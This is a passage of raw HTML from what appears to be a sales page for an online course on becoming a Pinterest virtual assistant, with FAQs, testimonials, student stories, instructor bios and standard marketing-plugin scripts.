data-tab="7" role="tabpanel" aria-labelledby="elementor-tab-title-1867"><p>Once you enroll in the course, you have unlimited access to the course 24/7! You can go at your own pace – whether it’s an hour per day or a few hours over the weekend.</p><p>Even if you don’t have time to start the course right this second, you can purchase the course now and access it when you’re ready! You&#8217;ll also gain access to any course updates for FREE down the road!</p><p>Completing the course will depend on your schedule – most students are able to complete the course within a month!</p></div> </div> <div class="elementor-accordion-item"> <div id="elementor-tab-title-1868" class="elementor-tab-title" data-tab="8" role="tab" aria-controls="elementor-tab-content-1868"> <span class="elementor-accordion-icon elementor-accordion-icon-right" aria-hidden="true"> <i class="elementor-accordion-icon-closed fa fa-minus-circle"></i> <i class="elementor-accordion-icon-opened fa fa-minus"></i> </span> <a href="">Do I need to have a blog?</a> </div> <div id="elementor-tab-content-1868" class="elementor-tab-content elementor-clearfix" data-tab="8" role="tabpanel" aria-labelledby="elementor-tab-title-1868"><p>You do NOT need to have a blog in order to become a Pinterest VA.</p><p>While we do recommend having an online space for your new business, a blog is not required.</p><p>Inside the program, we review all the ways to advertise your business without having to be a blogger. There are free and paid options available!</p></div> </div> <div class="elementor-accordion-item"> <div id="elementor-tab-title-1869" class="elementor-tab-title" data-tab="9" role="tab" aria-controls="elementor-tab-content-1869"> <span class="elementor-accordion-icon elementor-accordion-icon-right" aria-hidden="true"> <i class="elementor-accordion-icon-closed fa fa-minus-circle"></i> <i class="elementor-accordion-icon-opened fa fa-minus"></i> </span> <a href="">How long will it take me to earn my investment back?</a> </div> <div id="elementor-tab-content-1869" class="elementor-tab-content elementor-clearfix" data-tab="9" role="tabpanel" aria-labelledby="elementor-tab-title-1869"><p>Based on the services you decide to offer (there are 9 of them!), you can earn your investment back with your very first client.</p><p>That doesn’t include the recurring revenue you can earn as their ongoing account manager. Over the course of the year, that adds up to THOUSANDS OF DOLLARS!</p><p>From just one ongoing relationship.</p><p>Working just a few hours per week from your home, your local coffee shop or the Bahamas if you want!</p><p>Even better? The course includes an entire module breaking down the individual service offerings and how much to charge based on your client’s wants and needs.</p><p>No brainer, right?!?</p></div> </div> <div class="elementor-accordion-item"> <div id="elementor-tab-title-18610" class="elementor-tab-title" data-tab="10" role="tab" aria-controls="elementor-tab-content-18610"> <span class="elementor-accordion-icon elementor-accordion-icon-right" aria-hidden="true"> <i class="elementor-accordion-icon-closed fa fa-minus-circle"></i> <i class="elementor-accordion-icon-opened fa fa-minus"></i> </span> <a href="">What if I'm struggling financially? Should I still enroll?</a> </div> <div id="elementor-tab-content-18610" class="elementor-tab-content elementor-clearfix" data-tab="10" role="tabpanel" aria-labelledby="elementor-tab-title-18610"><p>If you’re struggling financially, it might not be the right time to start a new business.</p><p>Since student success is so important to us, we’d rather you work things out, set some money aside each month and join us down the road when you’re really ready.</p><p>There will be additional opportunities to enroll in the future.</p></div> </div> <div class="elementor-accordion-item"> <div id="elementor-tab-title-18611" class="elementor-tab-title" data-tab="11" role="tab" aria-controls="elementor-tab-content-18611"> <span class="elementor-accordion-icon elementor-accordion-icon-right" aria-hidden="true"> <i class="elementor-accordion-icon-closed fa fa-minus-circle"></i> <i class="elementor-accordion-icon-opened fa fa-minus"></i> </span> <a href="">Are there any other expenses besides the course fee?</a> </div> <div id="elementor-tab-content-18611" class="elementor-tab-content elementor-clearfix" data-tab="11" role="tabpanel" aria-labelledby="elementor-tab-title-18611"><p>Starting a new business takes <em>some</em> financial resources.</p><p>But starting a PVA biz takes a lot less than your traditional brick-and-mortar store! Your investment is also far less than going back to school and getting a college degree.</p><p>In addition to enrolling in the course (provided you don&#8217;t want to figure things all out on your own), here are a few other tools you&#8217;ll need, including any expenses you might incur:</p><ul><li>Canva – FREE ($10/m if you decide to upgrade to Canva for Work)</li><li>Tailwind – FREE for 60 days ($15/m thereafter)</li><li>Invoicing software – FREE (~$10/m for most paid options, which include extra features like bookkeeping)</li></ul><p><strong>Concerned about extra costs?</strong> Don&#8217;t be!</p><p>You can get started with the free options and roll any paid versions into the fees you charge clients! We cover how to do this inside of the course.</p><p>Investing in an online course takes more than just money, however.</p><p>It takes <strong>time</strong> to learn the material and put it into practice. It takes <strong>persistence</strong> and <strong>faith</strong> when things aren&#8217;t happening as quickly as you&#8217;d like. It takes <strong>a positive attitude</strong> and <strong>stick-with-it-ness</strong> to persevere through challenges and realize opportunity.</p><p>You got this though! And we&#8217;re here to help!</p></div> </div> <div class="elementor-accordion-item"> <div id="elementor-tab-title-18612" class="elementor-tab-title" data-tab="12" role="tab" aria-controls="elementor-tab-content-18612"> <span class="elementor-accordion-icon elementor-accordion-icon-right" aria-hidden="true"> <i class="elementor-accordion-icon-closed fa fa-minus-circle"></i> <i class="elementor-accordion-icon-opened fa fa-minus"></i> </span> <a href="">Do you have a refund policy?</a> </div> <div id="elementor-tab-content-18612" class="elementor-tab-content elementor-clearfix" data-tab="12" role="tabpanel" aria-labelledby="elementor-tab-title-18612"><p>We do!</p><p>If you enroll and find out <strong>within 7 days</strong> that the course isn&#8217;t a good fit for you, we&#8217;ll refund your course enrollment in full.</p><p>The only thing we ask is that you don&#8217;t make your way past Module 1 (we can tell!) to establish whether or not our course is a good fit for you. </p></div> </div> </div> </div> </div> <div class="elementor-element elementor-element-b28614b elementor-align-center elementor-widget elementor-widget-button" data-id="b28614b" data-element_type="widget" data-widget_type="button.default"> <div class="elementor-widget-container"> <div class="elementor-button-wrapper"> <a href="https://pinterestva.lpages.co/leadbox/140d85c73f72a2%3A1521bf1e0946dc/5668600916475904" class="elementor-button-link elementor-button elementor-size-md" role="button"> <span class="elementor-button-content-wrapper"> <span class="elementor-button-text">ADD ME TO THE WAITLIST!</span> </span> </a> </div> </div> </div> </div> </div> </div> </div> </div> </section> <section class="elementor-element elementor-element-7483093 elementor-section-boxed elementor-section-height-default elementor-section-height-default elementor-section elementor-top-section" data-id="7483093" data-element_type="section"> <div class="elementor-container elementor-column-gap-default"> <div class="elementor-row"> <div class="elementor-element elementor-element-f577556 elementor-column elementor-col-100 elementor-top-column" data-id="f577556" data-element_type="column"> <div class="elementor-column-wrap elementor-element-populated"> <div class="elementor-widget-wrap"> <div class="elementor-element elementor-element-bf06207 elementor-widget elementor-widget-divider" data-id="bf06207" data-element_type="widget" data-widget_type="divider.default"> <div class="elementor-widget-container"> <div class="elementor-divider"> <span class="elementor-divider-separator"></span> </div> </div> </div> </div> </div> </div> </div> </div> </section> <section class="elementor-element elementor-element-68e3522 elementor-section-boxed elementor-section-height-default elementor-section-height-default elementor-section elementor-top-section" data-id="68e3522" data-element_type="section"> <div class="elementor-container elementor-column-gap-default"> <div class="elementor-row"> <div class="elementor-element elementor-element-59bb9cc elementor-column elementor-col-100 elementor-top-column" data-id="59bb9cc" data-element_type="column"> <div class="elementor-column-wrap elementor-element-populated"> <div class="elementor-widget-wrap"> <div class="elementor-element elementor-element-500fd8c elementor-widget elementor-widget-heading" data-id="500fd8c" data-element_type="widget" data-widget_type="heading.default"> <div class="elementor-widget-container"> <h2 class="elementor-heading-title elementor-size-default">Everyone's hiring our PVAs... we'll help you get hired too!</h2> </div> </div> </div> </div> </div> </div> </div> </section> <section class="elementor-element elementor-element-7ec7ff5 elementor-section-stretched elementor-section-boxed elementor-section-height-default elementor-section-height-default elementor-section elementor-top-section" data-id="7ec7ff5" data-element_type="section" data-settings="{&quot;background_background&quot;:&quot;classic&quot;,&quot;stretch_section&quot;:&quot;section-stretched&quot;}"> <div class="elementor-background-overlay"></div> <div class="elementor-container elementor-column-gap-default"> <div class="elementor-row"> <div class="elementor-element elementor-element-76b417d elementor-column elementor-col-100 elementor-top-column" data-id="76b417d" data-element_type="column"> <div class="elementor-column-wrap elementor-element-populated"> <div class="elementor-widget-wrap"> <div class="elementor-element elementor-element-4806aa8 elementor-testimonial--skin-bubble elementor-testimonial--layout-image_above elementor-testimonial--align-center elementor-arrows-yes elementor-pagination-type-bullets elementor-widget elementor-widget-testimonial-carousel" data-id="4806aa8" data-element_type="widget" data-settings="{&quot;show_arrows&quot;:&quot;yes&quot;,&quot;pagination&quot;:&quot;bullets&quot;,&quot;speed&quot;:500,&quot;autoplay&quot;:&quot;yes&quot;,&quot;autoplay_speed&quot;:5000,&quot;loop&quot;:&quot;yes&quot;,&quot;pause_on_interaction&quot;:&quot;yes&quot;,&quot;space_between&quot;:{&quot;unit&quot;:&quot;px&quot;,&quot;size&quot;:10,&quot;sizes&quot;:[]},&quot;space_between_tablet&quot;:{&quot;unit&quot;:&quot;px&quot;,&quot;size&quot;:10,&quot;sizes&quot;:[]},&quot;space_between_mobile&quot;:{&quot;unit&quot;:&quot;px&quot;,&quot;size&quot;:10,&quot;sizes&quot;:[]}}" data-widget_type="testimonial-carousel.default"> <div class="elementor-widget-container"> <div class="elementor-swiper"> <div class="elementor-main-swiper swiper-container"> <div class="swiper-wrapper"> <div class="swiper-slide"> <div class="elementor-testimonial"> <div class="elementor-testimonial__content"> <div class="elementor-testimonial__text"> "I hired a grad from Kristin and Gina's Become a Pinterest VA TODAY! program and am absolutely thrilled to have found someone who's not only a hard worker, but also well-educated on the Pinterest platform. As a blogger who's hired multiple Pinterest VAs over the years (none from Gina + Kristin though!), I can sadly tell you this isn't always the case. 😥 I hired the best fit and she got to work immediately. Traffic to my site from Pinterest more than DOUBLED in our first month working together – a true testament to this program. I'm kicking myself for not coming to them first." </div> </div> <div class="elementor-testimonial__footer"> <div class="elementor-testimonial__image"> <img src="https://sxqykv430h-flywheel.netdna-ssl.com/wp-content/uploads/2019/04/Helpingthebusywomancatapultherblogintosuccesswithblognicheideasadviceonhowablogworksdetailedblogincomereportsandgeneralbloggingtips.jpeg" alt="Allison Lindstrom"> </div> <cite class="elementor-testimonial__cite"><span class="elementor-testimonial__name">Allison Lindstrom</span><span class="elementor-testimonial__title">allisonlindstrom.com</span></cite> </div> </div> </div> <div class="swiper-slide"> <div class="elementor-testimonial"> <div class="elementor-testimonial__content"> <div class="elementor-testimonial__text"> “I hired one of your Pinterest VAs – she took two weeks to audit my accounts and rearrange where I was screwing up in Tailwind. We’re into the second month of working together and focusing on increasing traffic back to my site, which is my ultimate goal!” </div> </div> <div class="elementor-testimonial__footer"> <div class="elementor-testimonial__image"> <img src="https://sxqykv430h-flywheel.netdna-ssl.com/wp-content/uploads/2019/04/Hank-1-1.png" alt="Hank Coleman"> </div> <cite class="elementor-testimonial__cite"><span class="elementor-testimonial__name">Hank Coleman</span><span class="elementor-testimonial__title">moneyqanda.com</span></cite> </div> </div> </div> <div class="swiper-slide"> <div class="elementor-testimonial"> <div class="elementor-testimonial__content"> <div class="elementor-testimonial__text"> "The process of finding a Pinterest VA was easier than I expected. I'm so grateful to have found somebody who is a great match for me and my business!" </div> </div> <div class="elementor-testimonial__footer"> <div class="elementor-testimonial__image"> <img src="https://sxqykv430h-flywheel.netdna-ssl.com/wp-content/uploads/2019/04/copy-e1517531899398.jpg" alt="Shaina Leis"> </div> <cite class="elementor-testimonial__cite"><span class="elementor-testimonial__name">Shaina Leis</span><span class="elementor-testimonial__title">shainaleis.com</span></cite> </div> </div> </div> </div> <div class="swiper-pagination"></div> <div class="elementor-swiper-button elementor-swiper-button-prev"> <i class="eicon-chevron-left" aria-hidden="true"></i> <span class="elementor-screen-only">Previous</span> </div> <div class="elementor-swiper-button elementor-swiper-button-next"> <i class="eicon-chevron-right" aria-hidden="true"></i> <span class="elementor-screen-only">Next</span> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </section> <section class="elementor-element elementor-element-a195f78 elementor-section-boxed elementor-section-height-default elementor-section-height-default elementor-section elementor-top-section" data-id="a195f78" data-element_type="section"> <div class="elementor-container elementor-column-gap-default"> <div class="elementor-row"> <div class="elementor-element elementor-element-54674cb elementor-column elementor-col-100 elementor-top-column" data-id="54674cb" data-element_type="column"> <div class="elementor-column-wrap elementor-element-populated"> <div class="elementor-widget-wrap"> <div class="elementor-element elementor-element-79bde67 elementor-widget elementor-widget-divider" data-id="79bde67" data-element_type="widget" data-widget_type="divider.default"> <div class="elementor-widget-container"> <div class="elementor-divider"> <span class="elementor-divider-separator"></span> </div> </div> </div> <div class="elementor-element elementor-element-7c622b1 elementor-widget elementor-widget-heading" data-id="7c622b1" data-element_type="widget" data-widget_type="heading.default"> <div class="elementor-widget-container"> <h2 class="elementor-heading-title elementor-size-default">Meet Victoria</h2> </div> </div> <div class="elementor-element elementor-element-518de2f elementor-widget elementor-widget-text-editor" data-id="518de2f" data-element_type="widget" data-widget_type="text-editor.default"> <div class="elementor-widget-container"> <div class="elementor-text-editor elementor-clearfix"><h3>While on maternity leave, Victoria decided that she didn’t want to return to her day job – instead, she wanted to find something she could do from home while raising her new baby!<br /> <br />Victoria started the PVA program and immediately started to land clients – <i>all while on maternity leave!</i><br /> <br />In January of 2019, Victoria returned to her day job and reduced her hours to <i>part-time</i> as her Pinterest VA business was growing so quickly.<br /> <br />As of April 2019, Victoria quit her day job as an ultrasound technician to become a SAHM and run her full-time Pinterest VA biz! Women truly can do it all… <span class="Pt tGvGdc" data-emo="😉">😉</span></h3><h3> </h3></div> </div> </div> <div class="elementor-element elementor-element-30ec583 elementor-aspect-ratio-169 elementor-widget elementor-widget-video" data-id="30ec583" data-element_type="widget" data-settings="{&quot;aspect_ratio&quot;:&quot;169&quot;}" data-widget_type="video.default"> <div class="elementor-widget-container"> <div class="elementor-wrapper elementor-fit-aspect-ratio elementor-open-inline"> <iframe class="elementor-video-iframe" allowfullscreen src="https://player.vimeo.com/video/331415678?color&amp;autopause=0&amp;loop=0&amp;muted=0&amp;title=1&amp;portrait=1&amp;byline=1#t="></iframe> <div class="elementor-custom-embed-image-overlay" style="background-image: url(https://pinterestva.com/wp-content/uploads/2019/04/Victoria-Sharp-PVA.png);"> </div> </div> </div> </div> </div> </div> </div> </div> </div> </section> <section class="elementor-element elementor-element-5a53e32 elementor-section-boxed elementor-section-height-default elementor-section-height-default elementor-section elementor-top-section" data-id="5a53e32" data-element_type="section"> <div class="elementor-container elementor-column-gap-default"> <div class="elementor-row"> <div class="elementor-element elementor-element-642177b elementor-column elementor-col-100 elementor-top-column" data-id="642177b" data-element_type="column"> <div class="elementor-column-wrap elementor-element-populated"> <div class="elementor-widget-wrap"> <div class="elementor-element elementor-element-2991b68 elementor-widget elementor-widget-divider" data-id="2991b68" data-element_type="widget" data-widget_type="divider.default"> <div class="elementor-widget-container"> <div class="elementor-divider"> <span class="elementor-divider-separator"></span> </div> </div> </div> </div> </div> </div> </div> </div> </section> <section class="elementor-element elementor-element-1f6882b elementor-section-boxed elementor-section-height-default elementor-section-height-default elementor-section elementor-top-section" data-id="1f6882b" data-element_type="section"> <div class="elementor-container elementor-column-gap-default"> <div class="elementor-row"> <div class="elementor-element elementor-element-4f87459 elementor-column elementor-col-100 elementor-top-column" data-id="4f87459" data-element_type="column"> <div class="elementor-column-wrap elementor-element-populated"> <div class="elementor-widget-wrap"> <div class="elementor-element elementor-element-2bf5a2f elementor-widget elementor-widget-heading" data-id="2bf5a2f" data-element_type="widget" data-widget_type="heading.default"> <div class="elementor-widget-container"> <h1 class="elementor-heading-title elementor-size-default">Who's teaching this course?</h1> </div> </div> </div> </div> </div> </div> </div> </section> <section class="elementor-element elementor-element-686daea elementor-section-boxed elementor-section-height-default elementor-section-height-default elementor-section elementor-top-section" data-id="686daea" data-element_type="section"> <div class="elementor-container elementor-column-gap-default"> <div class="elementor-row"> <div class="elementor-element elementor-element-2d2866d elementor-column elementor-col-33 elementor-top-column" data-id="2d2866d" data-element_type="column"> <div class="elementor-column-wrap elementor-element-populated"> <div class="elementor-widget-wrap"> <div class="elementor-element elementor-element-00293f8 elementor-widget elementor-widget-image" data-id="00293f8" data-element_type="widget" data-widget_type="image.default"> <div class="elementor-widget-container"> <div class="elementor-image"> <img width="489" height="512" src="https://sxqykv430h-flywheel.netdna-ssl.com/wp-content/uploads/2018/08/Gina2018Round-3.png" class="attachment-large size-large" alt="" srcset="https://sxqykv430h-flywheel.netdna-ssl.com/wp-content/uploads/2018/08/Gina2018Round-3.png 489w, https://sxqykv430h-flywheel.netdna-ssl.com/wp-content/uploads/2018/08/Gina2018Round-3-287x300.png 287w" sizes="(max-width: 489px) 100vw, 489px" /> </div> </div> </div> </div> </div> </div> <div class="elementor-element elementor-element-96d16be elementor-column elementor-col-33 elementor-top-column" data-id="96d16be" data-element_type="column"> <div class="elementor-column-wrap elementor-element-populated"> <div class="elementor-widget-wrap"> <div class="elementor-element elementor-element-688b067 elementor-widget elementor-widget-image" data-id="688b067" data-element_type="widget" data-widget_type="image.default"> <div class="elementor-widget-container"> <div class="elementor-image"> <img width="200" height="296" src="https://sxqykv430h-flywheel.netdna-ssl.com/wp-content/uploads/2017/08/Tailwind-Ambassador-Logo-e1501678183504.png" class="attachment-large size-large" alt="" /> </div> </div> </div> </div> </div> </div> <div class="elementor-element elementor-element-a86c2a2 elementor-column elementor-col-33 elementor-top-column" data-id="a86c2a2" data-element_type="column"> <div class="elementor-column-wrap elementor-element-populated"> <div class="elementor-widget-wrap"> <div class="elementor-element elementor-element-20900a4 elementor-widget elementor-widget-image" data-id="20900a4" data-element_type="widget" data-widget_type="image.default"> <div class="elementor-widget-container"> <div class="elementor-image"> <img width="399" height="399" src="https://sxqykv430h-flywheel.netdna-ssl.com/wp-content/uploads/2017/07/Kristin-Larsen.png" class="attachment-large size-large" alt="" srcset="https://sxqykv430h-flywheel.netdna-ssl.com/wp-content/uploads/2017/07/Kristin-Larsen.png 399w, https://sxqykv430h-flywheel.netdna-ssl.com/wp-content/uploads/2017/07/Kristin-Larsen-150x150.png 150w, https://sxqykv430h-flywheel.netdna-ssl.com/wp-content/uploads/2017/07/Kristin-Larsen-300x300.png 300w" sizes="(max-width: 399px) 100vw, 399px" /> </div> </div> </div> </div> </div> </div> </div> </div> </section> <section class="elementor-element elementor-element-87cf12f elementor-section-boxed elementor-section-height-default elementor-section-height-default elementor-section elementor-top-section" data-id="87cf12f" data-element_type="section"> <div class="elementor-container elementor-column-gap-default"> <div class="elementor-row"> <div class="elementor-element elementor-element-e674e00 elementor-column elementor-col-100 elementor-top-column" data-id="e674e00" data-element_type="column"> <div class="elementor-column-wrap elementor-element-populated"> <div class="elementor-widget-wrap"> <div class="elementor-element elementor-element-a9eddd9 elementor-widget elementor-widget-heading" data-id="a9eddd9" data-element_type="widget" data-widget_type="heading.default"> <div class="elementor-widget-container"> <h2 class="elementor-heading-title elementor-size-default">Glad you asked - Hi, we're Gina and Kristin!</h2> </div> </div> </div> </div> </div> </div> </div> </section> <section class="elementor-element elementor-element-cdb10b6 elementor-section-stretched elementor-section-boxed elementor-section-height-default elementor-section-height-default elementor-section elementor-top-section" data-id="cdb10b6" data-element_type="section" data-settings="{&quot;stretch_section&quot;:&quot;section-stretched&quot;}"> <div class="elementor-container elementor-column-gap-default"> <div class="elementor-row"> <div class="elementor-element elementor-element-d01221f elementor-column elementor-col-100 elementor-top-column" data-id="d01221f" data-element_type="column"> <div class="elementor-column-wrap elementor-element-populated"> <div class="elementor-widget-wrap"> <div class="elementor-element elementor-element-60d4aaf elementor-widget elementor-widget-text-editor" data-id="60d4aaf" data-element_type="widget" data-widget_type="text-editor.default"> <div class="elementor-widget-container"> <div class="elementor-text-editor elementor-clearfix"><p>Gina Horkey is the go-to person for those that want to become or find a kickass virtual assistant.</p><p>Founder of HorkeyHandBook.com and creator of <i>30 Days or Less to Freelance Writing</i> Success and <i>30 Days or Less to Virtual Assistant Success</i>, her best-selling online courses have taught THOUSANDS of students how to start and grow freelance businesses from scratch.</p><p>Gina built her own successful freelance writing and virtual assistant business in<strong> less than six months</strong> <i>while</i> working full-time and being a mama to two toddlers. She was able to earn more than $4,000 in a single month –<strong> just as a side hustle.</strong></p><p>Kristin Larsen is the go-to Pinterest person, speaking at and conducting several in-person workshops at conferences and for groups across the United States. She is also a Tailwind ambassador, an official Pinterest partner.</p><p>Founder of BelieveInABudget.com and creator of <i>Pinterest Presence and Side Hustle to Success</i>, her courses have helped entrepreneurs learn how to side hustle, launch a blog or business and master Pinterest.</p><p>In 2015 – as a new freelancer – Kristin launched a successful Pinterest management company that has <strong>helped over 100 bloggers, online business owners and brick-and-mortar shops</strong> experience explosive growth on Pinterest.</p><p>Within her first six months and in addition to her full time job, Kristin averaged $3,600 a month from her role as a Pinterest manager and blogger – just as a side hustle.</p></div> </div> </div> </div> </div> </div> </div> </div> </section> <section class="elementor-element elementor-element-72fe7a6 elementor-section-boxed elementor-section-height-default elementor-section-height-default elementor-section elementor-top-section" data-id="72fe7a6" data-element_type="section"> <div class="elementor-container elementor-column-gap-default"> <div class="elementor-row"> <div class="elementor-element elementor-element-247a566 elementor-column elementor-col-100 elementor-top-column" data-id="247a566" data-element_type="column"> <div class="elementor-column-wrap elementor-element-populated"> <div class="elementor-widget-wrap"> <div class="elementor-element elementor-element-d28ea71 elementor-widget elementor-widget-divider" data-id="d28ea71" data-element_type="widget" data-widget_type="divider.default"> <div class="elementor-widget-container"> <div class="elementor-divider"> <span class="elementor-divider-separator"></span> </div> </div> </div> </div> </div> </div> </div> </div> </section> <section class="elementor-element elementor-element-d7b20bf elementor-section-boxed elementor-section-height-default elementor-section-height-default elementor-section elementor-top-section" data-id="d7b20bf" data-element_type="section"> <div class="elementor-container elementor-column-gap-default"> <div class="elementor-row"> <div class="elementor-element elementor-element-9bf52d0 elementor-column elementor-col-100 elementor-top-column" data-id="9bf52d0" data-element_type="column"> <div class="elementor-column-wrap elementor-element-populated"> <div class="elementor-widget-wrap"> <div class="elementor-element elementor-element-54bd283 elementor-widget elementor-widget-heading" data-id="54bd283" data-element_type="widget" data-widget_type="heading.default"> <div class="elementor-widget-container"> <h2 class="elementor-heading-title elementor-size-default">Meet Heidi</h2> </div> </div> <div class="elementor-element elementor-element-cce84e0 elementor-widget elementor-widget-text-editor" data-id="cce84e0" data-element_type="widget" data-widget_type="text-editor.default"> <div class="elementor-widget-container"> <div class="elementor-text-editor elementor-clearfix"><h3>Heidi decided to become a Pinterest virtual assistant to earn extra income.</h3><h3> </h3><h3>Within a few weeks, she landed her first client. </h3><h3> </h3><h3>This gave her the confidence to land MORE clients and grow her Pinterest VA business!</h3></div> </div> </div> <div class="elementor-element elementor-element-a8746c6 elementor-aspect-ratio-169 elementor-widget elementor-widget-video" data-id="a8746c6" data-element_type="widget" data-settings="{&quot;aspect_ratio&quot;:&quot;169&quot;}" data-widget_type="video.default"> <div class="elementor-widget-container"> <div class="elementor-wrapper elementor-fit-aspect-ratio elementor-open-inline"> <iframe class="elementor-video-iframe" allowfullscreen src="https://player.vimeo.com/video/331083212?color&amp;autopause=0&amp;loop=0&amp;muted=0&amp;title=1&amp;portrait=1&amp;byline=1#t="></iframe> <div class="elementor-custom-embed-image-overlay" style="background-image: url(https://pinterestva.com/wp-content/uploads/2019/04/2-1.png);"> </div> </div> </div> </div> </div> </div> </div> </div> </div> </section> <section class="elementor-element elementor-element-b36fc31 elementor-section-stretched elementor-section-boxed elementor-section-height-default elementor-section-height-default elementor-section elementor-top-section" data-id="b36fc31" data-element_type="section" data-settings="{&quot;stretch_section&quot;:&quot;section-stretched&quot;}"> <div class="elementor-container elementor-column-gap-default"> <div class="elementor-row"> <div class="elementor-element elementor-element-bd2db27 elementor-column elementor-col-100 elementor-top-column" data-id="bd2db27" data-element_type="column"> <div class="elementor-column-wrap elementor-element-populated"> <div class="elementor-widget-wrap"> <div class="elementor-element elementor-element-4ffdd79 elementor-widget elementor-widget-divider" data-id="4ffdd79" data-element_type="widget" data-widget_type="divider.default"> <div class="elementor-widget-container"> <div class="elementor-divider"> <span class="elementor-divider-separator"></span> </div> </div> </div> <div class="elementor-element elementor-element-8c8dcd0 elementor-widget elementor-widget-heading" data-id="8c8dcd0" data-element_type="widget" data-widget_type="heading.default"> <div class="elementor-widget-container"> <h1 class="elementor-heading-title elementor-size-default">Pinterest is currently one of the HOTTEST platforms around!</h1> </div> </div> </div> </div> </div> </div> </div> </section> <section class="elementor-element elementor-element-c4ee346 elementor-section-boxed elementor-section-height-default elementor-section-height-default elementor-section elementor-top-section" data-id="c4ee346" data-element_type="section"> <div class="elementor-container elementor-column-gap-default"> <div class="elementor-row"> <div class="elementor-element elementor-element-7d41aa8 elementor-column elementor-col-100 elementor-top-column" data-id="7d41aa8" data-element_type="column"> <div class="elementor-column-wrap elementor-element-populated"> <div class="elementor-widget-wrap"> <div class="elementor-element elementor-element-6a3c859 elementor-widget elementor-widget-text-editor" data-id="6a3c859" data-element_type="widget" data-widget_type="text-editor.default"> <div class="elementor-widget-container"> <div class="elementor-text-editor elementor-clearfix"><p style="text-align: left;">Bloggers and business owners alike are looking for help growing their Pinterest presence &#8211; and they need a savvy virtual assistant JUST LIKE YOU to help them succeed.</p></div> </div> </div> <div class="elementor-element elementor-element-6ff42c8 elementor-widget elementor-widget-heading" data-id="6ff42c8" data-element_type="widget" data-widget_type="heading.default"> <div class="elementor-widget-container"> <h2 class="elementor-heading-title elementor-size-default">So, what are you waiting for?</h2> </div> </div> <div class="elementor-element elementor-element-f5105fc elementor-align-center elementor-widget elementor-widget-button" data-id="f5105fc" data-element_type="widget" data-widget_type="button.default"> <div class="elementor-widget-container"> <div class="elementor-button-wrapper"> <a href="https://pinterestva.lpages.co/leadbox/140d85c73f72a2%3A1521bf1e0946dc/5668600916475904" class="elementor-button-link elementor-button elementor-size-md" role="button"> <span class="elementor-button-content-wrapper"> <span class="elementor-button-text">ADD ME TO THE WAITLIST!</span> </span> </a> </div> </div> </div> </div> </div> </div> </div> </div> </section> </div> </div> </div> <div class="swp-hidden-panel-wrap" style="display: none; visibility: collapse; opacity: 0"></div><div class="swp-content-locator"></div></div></article></main></div></div><nav class="nav-footer"><ul id="menu-footer" class="menu genesis-nav-menu"><li id="menu-item-1685" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1685"><a href="https://pinterestva.com/revised-home/" itemprop="url"><span itemprop="name">Home</span></a></li> <li id="menu-item-1687" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1687"><a href="https://pinterestva.com/hire-pinterest-virtual-assistant/" itemprop="url"><span itemprop="name">Hire a Pinterest Virtual Assistant</span></a></li> <li id="menu-item-1688" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-1688"><a href="mailto:[email protected]" itemprop="url"><span itemprop="name">Contact Us</span></a></li> </ul></nav><footer class="site-footer" itemscope itemtype="https://schema.org/WPFooter"><div class="wrap"><p>&#x000A9;&nbsp;2019<a href="http://pinterestva.com">&nbsp;PinterestVA.com</a> is a division of PVA Enterprises Corp</p> <p><a href="https://drive.google.com/file/d/1ySHNQK_oJYDHcRo2w2vqEHe4sk6zL4sq/view">Privacy Policy</a> | <a href="https://drive.google.com/file/d/1mJb9yWxv9L9CHqSObmmf_6fYxBnTGd84/view">Terms of Use</a></p></div></footer></div> <!-- Deadline Funnel --><script type="text/javascript" data-cfasync="false">function SendUrlToDeadlineFunnel(e){var r,t,c,a,h,n,o,A,i = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=",d=0,l=0,s="",u=[];if(!e)return e;do r=e.charCodeAt(d++),t=e.charCodeAt(d++),c=e.charCodeAt(d++),A=r<<16|t<<8|c,a=A>>18&63,h=A>>12&63,n=A>>6&63,o=63&A,u[l++]=i.charAt(a)+i.charAt(h)+i.charAt(n)+i.charAt(o);while(d<e.length);s=u.join("");var C=e.length%3;var decoded = (C?s.slice(0,C-3):s)+"===".slice(C||3);decoded = decoded.replace("+", "-");decoded = decoded.replace("/", "_");return decoded;} var url = SendUrlToDeadlineFunnel(location.href); var parentUrlValue;try {parentUrlValue = window.parent.location.href;} catch(err) {if(err.name === "SecurityError") {parentUrlValue = document.referrer;}}var parentUrl = (parent !== window) ? ("/" + SendUrlToDeadlineFunnel(parentUrlValue)) : "";(function() {var s = document.createElement("script");s.type = "text/javascript";s.async = true;s.setAttribute("data-scriptid", "dfunifiedcode");s.src ="https://a.deadlinefunnel.com/unified/reactunified.bundle.js?userIdHash=eyJpdiI6IkVrU2h6UUhSM0N2QWY2ak1lVHhyaWc9PSIsInZhbHVlIjoiMUdBWGxzZFdNTWRWTDhPRmRxajVqZz09IiwibWFjIjoiMThlNjRlZDBhMDlmY2FmMDIxZDBiYjllODMxNWY0OWRmNWE5NjA4ZjEyYmU0NjE5ODVjYjc2NTRiMDIwY2UyZSJ9&pageFromUrl="+url+"&parentPageFromUrl="+parentUrl;var s2 = document.getElementsByTagName("script")[0];s2.parentNode.insertBefore(s, s2);})(); </script><!-- End Deadline Funnel --> <!-- Instagram Feed JS --> <script type="text/javascript"> var sbiajaxurl = "https://pinterestva.com/wp-admin/admin-ajax.php"; </script> <script type='text/javascript' src='https://sxqykv430h-flywheel.netdna-ssl.com/wp-content/themes/restored316-captivating/js/slick.min.js?ver=1.6.0'></script> <script type='text/javascript' src='https://sxqykv430h-flywheel.netdna-ssl.com/wp-content/themes/restored316-captivating/js/slick-init.js?ver=1.0.0'></script> <script type='text/javascript'> /* <![CDATA[ */ var sb_instagram_js_options = {"sb_instagram_at":"","font_method":"svg"}; /* ]]> */ </script> <script type='text/javascript' src='https://sxqykv430h-flywheel.netdna-ssl.com/wp-content/plugins/instagram-feed/js/sb-instagram.min.js?ver=1.12'></script> <script type='text/javascript'> /* <![CDATA[ */ var socialWarfare = {"addons":[{"name":"Social Warfare - Pro","key":"pro","core_required":"3.3.0","product_id":63157,"store_url":"https:\/\/warfareplugins.com","version":"3.5.4","filepath":"\/www\/wp-content\/plugins\/social-warfare-pro\/social-warfare-pro.php","license_key":"63754a6aa196d12fe30cdc9102ee2f9d","is_registered":true},"pro"],"post_id":"1949","floatBeforeContent":""}; /* ]]> */ </script> <script type='text/javascript' 